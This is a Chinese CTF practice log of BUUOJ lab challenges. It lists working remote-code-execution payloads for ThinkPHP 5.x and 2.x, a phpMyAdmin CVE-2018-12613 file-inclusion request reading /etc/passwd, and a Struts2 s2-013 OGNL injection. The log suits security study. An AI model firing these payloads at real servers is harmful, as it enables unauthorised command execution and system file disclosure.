zoukankan html css js c++ java

BUU_Real_刷题记录

[ThinkPHP]5-Rce

v5.0.23及v5.1.31以下版本远程命令执行漏洞

http://node3.buuoj.cn:29858/index.php
?s=index/thinkapp/invokefunction
&function=call_user_func_array
&vars[0]=system
&vars[1][]=whoami

获得flag

http://node3.buuoj.cn:26215/index.php?s=index/thinkapp/invokefunction
&function=call_user_func_array
&vars[0]=phpinfo
&vars[1][]=-1

Thinkphp5 RCE总结

[ThinkPHP]5.0.23-Rce

POST /index.php?s=captcha HTTP/1.1
Host: node3.buuoj.cn:25184
Content-Length: 76
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Origin: http://node3.buuoj.cn:25184
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://node3.buuoj.cn:25184/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=ls
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

_method=__construct&filter[]=system&server[REQUEST_METHOD]=php -i&method=get

[ThinkPHP]2-Rce

http://node3.buuoj.cn:28705/index.php/Index/index/name/${@phpinfo()}

http://node3.buuoj.cn:28705/index.php/Index/index/name/${@system(pwd)}

Thinkphp2.1漏洞利用

ThinkPHP系列漏洞之ThinkPHP 2.x 任意代码执行

[PHPMYADMIN]CVE-2018-12613

http://node3.buuoj.cn:28623/index.php?target=sql.php%253F/../../../../../../etc/passwd

phpadmin执行 select “<?php phpinfo();?>”

GET /index.php?target=tbl_sql.php%253F/../../../../../../../../../../../../../../tmp/sess_672a9aa66b158e4b49d9c1892d0a30c8 HTTP/1.1
Host: node3.buuoj.cn:28623
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: pma_lang=zh_CN; phpMyAdmin=672a9aa66b158e4b49d9c1892d0a30c8; auto_saved_sql_sort=
Connection: close

phpMyAdmin 4.8.x LFI to RCE

[struts2]s2-013

http://node3.buuoj.cn:26757/link.action
?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

Struts2再爆远程代码执行漏洞

env: 用于显示系统中已存在的环境变量，以及在定义的环境中执行指令。变量定义：定义在新的环境中变量，定义多个变量定义用空格隔开。格式为“变量名=值”；

[struts2]s2-045

查看全文

相关阅读:
[Cocos2d-x]布局与定位
 [Cocos2d-x]创建项目
 nylg-154-king 选太子
 nylg-153-king VS king
hdoj-2053-Switch Game
hdoj-2052-Picture
hdoj-2051-Bitset
hdoj-2050-折线分割平面
 大一c语言课程设计-学籍管理系统
 hdoj-2049-不容易系列之(4)——考新郎

原文地址：https://www.cnblogs.com/chrysanthemum/p/13681983.html